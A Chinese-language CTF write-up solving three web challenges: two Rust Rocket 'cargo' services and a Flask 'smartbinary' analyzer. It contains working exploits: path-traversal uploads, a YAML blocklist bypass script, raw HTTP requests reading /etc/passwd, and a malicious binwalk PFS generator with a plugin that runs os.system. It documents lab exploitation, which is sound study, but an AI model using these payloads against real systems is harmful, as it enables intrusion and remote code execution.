Table of contents
Open Table of contents
cargo
一道 rust 题
虽然之前断断续续看过一段时间的 course.rs, 不过后面由于各种原因就没有继续学习, 有点可惜 (
#[macro_use]
extern crate rocket;
use crate::rocket::data::ToByteUnit;
use rand::distributions::Alphanumeric;
use rand::Rng;
use rocket::Data;
use std::collections::HashMap;
use std::fs;
use std::io;
use std::path::Path;
use std::process::Command;
fn gen_id(length: usize) -> String {
let mut rng = rand::thread_rng();
let chars = std::iter::repeat(())
.map(|()| rng.sample(Alphanumeric))
.filter(|c| (c.is_ascii_hexdigit()))
.take(length)
.collect();
String::from_utf8(chars).unwrap_or_default()
}
#[post("/upload/<id>", data = "<data>")]
async fn upload(id: String, data: Data<'_>) -> io::Result<String> {
if !id.contains("user") {
return Ok("Done".to_string());
}
let path = Path::new("upload").join(id).join("src").join("main.rs");
data.open(8_u32.kibibytes()).into_file(path).await?;
Ok("Done".to_string())
}
#[get("/config/<conf>")]
fn config(conf: String) -> io::Result<String> {
let filtered: String = conf
.chars()
.filter(|c| c.is_alphanumeric() || *c==' ' || *c==',')
.collect();
let mut added = String::from("");
let parts: Vec<&str> = filtered.split(',').collect();
for part in parts {
if added.is_empty() {
added += part;
added += ":\n";
} else {
added += " - ";
added += part;
added += "\n";
}
}
added += " - goto user\n";
let old = fs::read_to_string("config.yml")?;
let new = format!("{}{}", added, old);
fs::write("config.yml", new)?;
Ok("Done".to_string())
}
#[get("/cargo/<id>/<cmd>")]
fn command(cmd: String, id: String) -> Option<String> {
let c = fs::read_to_string("config.yml").ok()?;
let config: HashMap<String, Vec<String>> = serde_yaml::from_str(&c).ok()?;
let mut ok = true;
let mut target = id.clone();
for (k, v) in config {
if target.contains(&k) {
for keyword in v {
if cmd.contains(&keyword) {
ok = false;
}
if keyword.starts_with("goto ") {
target = keyword.to_string().get(5..).unwrap_or("").to_string();
}
}
}
}
if !ok {
return Some("redacted".to_string());
}
let output = Command::new("cargo")
.arg(&cmd)
.current_dir(Path::new("upload").join(id))
.output()
.ok()?;
Some(format!("{}", String::from_utf8_lossy(&output.stdout)))
}
#[get("/new")]
fn new() -> io::Result<String> {
let user_id = format!("user{}", gen_id(16));
Command::new("cargo")
.arg("init")
.arg(&user_id)
.current_dir(Path::new("upload"))
.output()?;
Ok(user_id.to_string())
}
#[get("/reset")]
fn reset() -> io::Result<String> {
Command::new("rm").arg("-rf").arg("upload").output()?;
Command::new("mkdir").arg("-p").arg("upload").output()?;
for test in &["test1", "test2", "test3"] {
Command::new("cargo")
.arg("init")
.arg(test)
.current_dir(Path::new("upload"))
.output()?;
}
let admin_id = gen_id(16);
fs::write("config.yml", format!("{}:\n\nuser:\n - bench\n - check\n - doc\n - fetch\n - fix\n - run\n - rustc\n - rustdoc\n - test\n - report\ntest:\n - bench\n - run\n - test\n", admin_id))?;
Ok("Done".to_string())
}
#[get("/")]
fn index() -> &'static str {
"This is Index"
}
#[launch]
fn rocket() -> _ {
rocket::build().mount("/", routes![index, reset, new, command, config, upload])
}
Cargo.toml
[package]
name = "task1"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
rocket = "0.5.0"
serde = { version = "1.0.189", features = ["derive"] }
serde_yaml = "0.9.25"
rand = "0.8.5"
config.yaml
RAND_STR:
user:
- bench
- check
- doc
- fetch
- fix
- run
- rustc
- rustdoc
- test
- report
test:
- bench
- run
- test
网站可以创建 user, 上传 rust 代码, 并调用 cargo 系列命令
config.yaml 以 user 和 test 开头的用户 ban 了能够执行代码的子命令 (run bench test)
/new 路由创建用户, 用户名的规则为 user + 随机字符串
/config 路由自定义被 ban 的子命令, 然后将配置写入 config.yml 的开头, 配置结尾会加入 go to user 表示跳转到 user 那部分的配置
/upload 路由上传代码, 保存为 main.rs, 可以目录穿越
/cargo 路由调用 cargo 子命令, 会读取 config.yaml 里面的配置并进行过滤, 最后会将运行的输出作为结果回显
这里是个非预期, cargo r 是 cargo run 的别名 (alias), 所以直接就能 RCE
payload
reset
GET /reset HTTP/1.1
Host: 127.0.0.1:8000
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
new
GET /new HTTP/1.1
Host: 127.0.0.1:8000
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
upload
POST /upload/userC0bd33e7218b9Dc7 HTTP/1.1
Host: 127.0.0.1:8000
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 473
use std::fs;
fn main() {
let file_content = fs::read_to_string("/etc/passwd")
.expect("Failed to read file");
println!("File content:\n{}", file_content);
}
cargo r
GET /cargo/userC0bd33e7218b9Dc7/r HTTP/1.1
Host: 127.0.0.1:8000
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
cargo2
cargo2 修复了 cargo 的非预期
#[macro_use]
extern crate rocket;
use crate::rocket::data::ToByteUnit;
use rand::distributions::Alphanumeric;
use rand::Rng;
use rocket::Data;
use std::collections::HashMap;
use std::fs;
use std::io;
use std::path::Path;
use std::process::Command;
fn gen_id(length: usize) -> String {
let mut rng = rand::thread_rng();
let chars = std::iter::repeat(())
.map(|()| rng.sample(Alphanumeric))
.filter(|c| (c.is_ascii_hexdigit()))
.take(length)
.collect();
String::from_utf8(chars).unwrap_or_default()
}
#[post("/upload/<id>", data = "<data>")]
async fn upload(id: String, data: Data<'_>) -> io::Result<String> {
if !id.contains("user") {
return Ok("Done".to_string());
}
let path = Path::new("upload").join(id).join("src").join("main.rs");
data.open(8_u32.kibibytes()).into_file(path).await?;
Ok("Done".to_string())
}
#[get("/config/<conf>")]
fn config(conf: String) -> io::Result<String> {
let filtered: String = conf
.chars()
.filter(|c| c.is_ascii_alphanumeric() || *c == ' ' || *c == ',')
.collect();
let mut added = String::from("");
let parts: Vec<&str> = filtered.split(',').collect();
for part in parts {
if added.is_empty() {
if part == "user" || part == "test" {
return Ok("Failed".to_string());
}
added += part;
added += ":\n";
} else {
added += " - ";
added += part;
added += "\n";
}
}
added += " - goto user\n";
let old = fs::read_to_string("config.yml")?;
let new = format!("{}{}", added, old);
fs::write("config.yml", new)?;
Ok("Done".to_string())
}
#[get("/cargo/<id>/<cmd>")]
fn command(cmd: String, id: String) -> Option<String> {
if id.chars().any(|c| !c.is_ascii_alphanumeric()) {
return Some("redacted".to_string());
}
let c = fs::read_to_string("config.yml").ok()?;
let config: HashMap<String, Vec<String>> = serde_yaml::from_str(&c).ok()?;
let mut ok = true;
let mut target = id.clone();
for (k, v) in config {
if target.contains(&k) {
for keyword in v {
if cmd.contains(&keyword) {
ok = false;
}
if keyword.starts_with("goto ") {
target = keyword.to_string().get(5..).unwrap_or("").to_string();
}
}
}
}
if !ok {
return Some("redacted".to_string());
}
let output = Command::new("cargo")
.arg(&cmd)
.current_dir(Path::new("upload").join(id))
.output()
.ok()?;
Some(format!("{}", String::from_utf8_lossy(&output.stdout)))
}
#[get("/new")]
fn new() -> io::Result<String> {
let user_id = format!("user{}", gen_id(16));
Command::new("cargo")
.arg("init")
.arg(&user_id)
.current_dir(Path::new("upload"))
.output()?;
Ok(user_id.to_string())
}
#[get("/reset")]
fn reset() -> io::Result<String> {
Command::new("rm").arg("-rf").arg("upload").output()?;
Command::new("mkdir").arg("-p").arg("upload").output()?;
for test in &["test1", "test2", "test3"] {
Command::new("cargo")
.arg("init")
.arg(test)
.current_dir(Path::new("upload"))
.output()?;
}
let admin_id = gen_id(16);
fs::write("config.yml", format!("{}:\n\nuser:\n - bench\n - c\n - check\n - d\n - doc\n - fetch\n - fix\n - r\n - run\n - rustc\n - rustdoc\n - t\n - test\n - report\ntest:\n - bench\n - r\n - run\n - t\n - test\n", admin_id))?;
Ok("Done".to_string())
}
#[get("/")]
fn index() -> &'static str {
"This is Index"
}
#[launch]
fn rocket() -> _ {
rocket::build().mount("/", routes![index, reset, new, command, config, upload])
}
这里直接说思路
仔细看 /cargo 路由的话会发现它的解析过程是存在问题的
#[get("/cargo/<id>/<cmd>")]
fn command(cmd: String, id: String) -> Option<String> {
if id.chars().any(|c| !c.is_ascii_alphanumeric()) {
return Some("redacted".to_string());
}
let c = fs::read_to_string("config.yml").ok()?;
let config: HashMap<String, Vec<String>> = serde_yaml::from_str(&c).ok()?;
let mut ok = true;
let mut target = id.clone();
for (k, v) in config {
if target.contains(&k) {
for keyword in v {
if cmd.contains(&keyword) {
ok = false;
}
if keyword.starts_with("goto ") {
target = keyword.to_string().get(5..).unwrap_or("").to_string();
}
}
}
}
if !ok {
return Some("redacted".to_string());
}
let output = Command::new("cargo")
.arg(&cmd)
.current_dir(Path::new("upload").join(id))
.output()
.ok()?;
Some(format!("{}", String::from_utf8_lossy(&output.stdout)))
}
yaml 反序列化的结果会存入 HashMap, 而众所周知 HashMap key 的顺序是不确定的, 与之相反的是 TreeMap
简单写个代码
use std::{fs, collections::HashMap};
fn main() {
let c = fs::read_to_string("config.yaml").expect("err");
let config: HashMap<String, Vec<String>> = serde_yaml::from_str(&c).expect("err");
for (k, _) in config {
println!("{}", k);
}
}
config.yaml
test1:
- a
- goto user
C8ecB8d1F7E02B3f:
user:
- bench
- c
- check
- d
- doc
- fetch
- fix
- r
- run
- rustc
- rustdoc
- t
- test
- report
test:
- bench
- r
- run
- t
- test
运行多次后会发现 test1 C8ecB8d1F7E02B3f user test 这四个 key 的顺序每次都有概率会不一样
然后结合题目的代码
for (k, v) in config {
if target.contains(&k) {
for keyword in v {
if cmd.contains(&keyword) {
ok = false;
}
if keyword.starts_with("goto ") {
target = keyword.to_string().get(5..).unwrap_or("").to_string();
}
}
}
}
if !ok {
return Some("redacted".to_string());
}
当 keyword 以 goto 开头时, 就会把当前的 target 改成 goto 后面的值, 也就是 user, 然后等到下一次循环的时候匹配 user 下的规则
那么只需要保证遍历 config 时, user 的顺序出现在我们自定义的用户 test1 前面就行 (也不一定是 test1, 通过 /new 路由创建的 userXXX 用户理论上也行)
以 test1 为例, 只需要保证顺序为: user > test1 > test 即可同时绕过 user 和 test 规则的检测
首先通过目录穿越将代码上传至 test1 用户的目录, 然后创建 test1 的 config, 最后访问 cargo run, 多打几次就能拿到 flag 了
import requests
url = 'http://4cckcq86xq36xrrj.instance.tctf.pwnable.cn:18080'
requests.get(url + '/reset')
user_id = requests.get(url + '/new').text
payload = '''
use std::fs;
fn main() {
let file_content = fs::read_to_string("/tmp/flag")
.expect("Failed to read file");
println!("File content:\n{}", file_content);
}'''
requests.get(url + '/config/test1,fake')
requests.post(url + '/upload/{}%2f..%2ftest1%2f'.format(user_id), data=payload)
'''
前后顺序必须为 user > test1 > test
user
C8ecB8d1F7E02B3f
test1
test
'''
while True:
flag = input()
if flag == 'EOF':
break
res = requests.get(url + '/cargo/test1/run')
print(res.text)
smartbinary
app.py
import hashlib
import json
import os
import subprocess
from typing import Any
from flask import Flask, render_template, request
def run_cmd(cmd: str) -> str:
r = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding="utf8")
out = r.stdout
return out
class Analyzer:
def __init__(self) -> None:
self.name = ""
def analyze(self, filename: str) -> str:
return ""
class FileAnalyzer(Analyzer):
def __init__(self) -> None:
self.name = "file"
def analyze(self, filename: str) -> str:
return run_cmd(f"file {filename}")
class StringsAnalyzer:
def __init__(self) -> None:
self.name = "string"
def analyze(self, filename: str) -> str:
return run_cmd(f"strings {filename}")
class UnzipAnalyzer:
def __init__(self) -> None:
self.name = "upzip"
def analyze(self, filename: str) -> str:
return run_cmd(f"unzip -z {filename}")
class BinwalkAnalyzer:
def __init__(self) -> None:
self.name = "binwalk"
def analyze(self, filename: str) -> str:
return run_cmd(f"binwalk -Me {filename}")
class UpxAnalyzer:
def __init__(self) -> None:
self.name = "upx"
def analyze(self, filename: str) -> str:
return run_cmd(f"upx -t {filename}")
class ReadelfAnalyzer:
def __init__(self) -> None:
self.name = "readelf"
def analyze(self, filename: str) -> str:
return run_cmd(f"readelf -h {filename}")
class ChecksecAnalyzer:
def __init__(self) -> None:
self.name = "checksec"
def analyze(self, filename: str) -> str:
return run_cmd(f"checksec {filename}")
analyzers = [FileAnalyzer(), StringsAnalyzer(), UnzipAnalyzer(), BinwalkAnalyzer(), UpxAnalyzer(), ReadelfAnalyzer(), ChecksecAnalyzer()]
def do_analyze(filename: str) -> dict[str, str]:
r: dict[str, str] = {}
for ana in analyzers:
name = ana.name
value = ana.analyze(filename)
r[name] = value
return r
def checkfilename(s: str) -> bool:
if not s:
return False
return all(c in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" for c in s)
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = "/tmp"
app.config['MAX_CONTENT_PATH'] = 1*1024*1024
@app.route("/")
def index() -> Any:
file_list_file = f"/tmp/smartbinary/filelist.txt"
with open(file_list_file, "r") as f:
filesha256s = f.read().split()
r = ""
r += "<p>welcome to smartbinary platform! it can analyze your file smartly.</p><p></p>"
r += '''<form action="/upload" method="post" enctype="multipart/form-data">
<label>upload a file</label>
<input type="file" name="file"></input>
<input type="submit">submit</input>
</form>
'''
r += "<br><br>"
for filesha256 in filesha256s:
r += f'<a href="/analyze?filesha256={filesha256}">do analyze on file {filesha256}</a><br>'
r += f'<a href="/file/{filesha256}">analyze result of {filesha256}</a><br>'
return r
@app.route("/upload", methods=["POST"])
def upload() -> Any:
f = request.files['file']
f.save("/tmp/smartbinary_tmpfile")
with open("/tmp/smartbinary_tmpfile", "rb") as f:
content = f.read()
os.unlink(app.config['UPLOAD_FOLDER']+"/smartbinary_tmpfile")
filesha256 = hashlib.sha256(content).hexdigest()
file_dir = f"/tmp/smartbinary/{filesha256}"
file_path = f"{file_dir}/file"
if os.path.exists(file_path):
return "<p>file already uploaded</p>"
try:
os.makedirs(file_dir)
except FileExistsError:
pass
with open(file_path, "wb") as f:
f.write(content)
with open("/tmp/smartbinary/filelist.txt", "r") as f:
filelist = f.read().split()
filelist.append(filesha256)
with open("/tmp/smartbinary/filelist.txt", "w") as f:
for s in filelist:
f.write(s + "\n")
return "<p>upload successfully</p>"
@app.route("/analyze")
def analyze() -> Any:
filesha256 = request.args.get("filesha256")
if not checkfilename(filesha256):
return "<p>error</p>"
file_dir = f"/tmp/smartbinary/{filesha256}"
status_file_path = f"{file_dir}/status"
file_path = f"{file_dir}/file"
result_path = f"{file_dir}/result.json"
if os.path.exists(status_file_path):
return "<p>file already analyzed</p>"
if not os.path.exists(file_path):
return "<p>file not uploaded</p>"
try:
os.makedirs(file_dir)
except FileExistsError:
pass
with open(status_file_path, "w") as f:
f.write("RUNNING")
result = do_analyze(file_path)
with open(result_path, "w") as f:
json.dump(result, f)
with open(status_file_path, "w") as f:
f.write("FINISHED")
return "<p>analyze finish</p>"
@app.route("/file/<filesha256>")
def file(filesha256) -> Any:
if not checkfilename(filesha256):
return "<p>error</p>"
file_dir = f"/tmp/smartbinary/{filesha256}"
status_file_path = f"{file_dir}/status"
result_path = f"{file_dir}/result.json"
if not os.path.exists(status_file_path):
return "<p>no such file</p>"
with open(status_file_path, "r") as f:
status = f.read().strip()
result: Any = ""
if status == "FINISHED":
with open(result_path, "rb") as f:
result = json.load(f)
r = f"<p>status: {status}</p><br><code>{result}</code>"
return r
try:
os.makedirs("/tmp/smartbinary")
except FileExistsError:
pass
if not os.path.exists("/tmp/smartbinary/filelist.txt"):
with open("/tmp/smartbinary/filelist.txt", "w") as f:
f.write("")
if __name__ == "__main__":
# run_cmd("ls / /a")
app.run(host="0.0.0.0", port=5000, debug=False)
直接给出思路: binwalk 2.3.3 版本存在目录穿越可导致 RCE
https://blog.csdn.net/leiwuhen92/article/details/131509099
https://github.com/Kalagious/BadPfs
https://github.com/ReFirmLabs/binwalk/pull/617
参考 BadPfs
import argparse
out = 'payload.pfs'
data = 'binwalk.py'
header = b'\x50\x46\x53\x2F\x30\x2E\x39\x0A\x00\x00\x00\x00\x00\x00\x01\x00'
badPfs = open(out,'wb')
badPfs.write(header)
targetFile = "../../../.config/binwalk/plugins/binwalk.py"
if len(targetFile) > 60:
print("Write filename too long")
exit()
badPfs.write(targetFile.encode())
for i in range(60-len(targetFile)):
badPfs.write(b'\x00')
badPfs.write(b'\x01'*4)
badPfs.write(b'\x00'*4)
data = open(data, 'rb').read()
badPfs.write(b'\x01'*4)
badPfs.write(len(data).to_bytes(4, 'little'))
badPfs.write(data)
binwalk.py
import binwalk.core.plugin
import os
class MaliciousExtractor(binwalk.core.plugin.Plugin):
def init(self):
os.system('cp /flag.txt /tmp/smartbinary/a9b1812*/status')
先正常传一个文件, 记下 sha256 开头 (因为 plugin 内容不能太长), 将 flag.txt 复制到该目录下的 status 文件
然后运行脚本构造 pfs 并用 zip 压缩, 上传, 分析
最后访问第一个文件的 analyze result 得到 flag
注意生成 pfs 后可能需要参考文章里的方法删除 pfs 内的空字符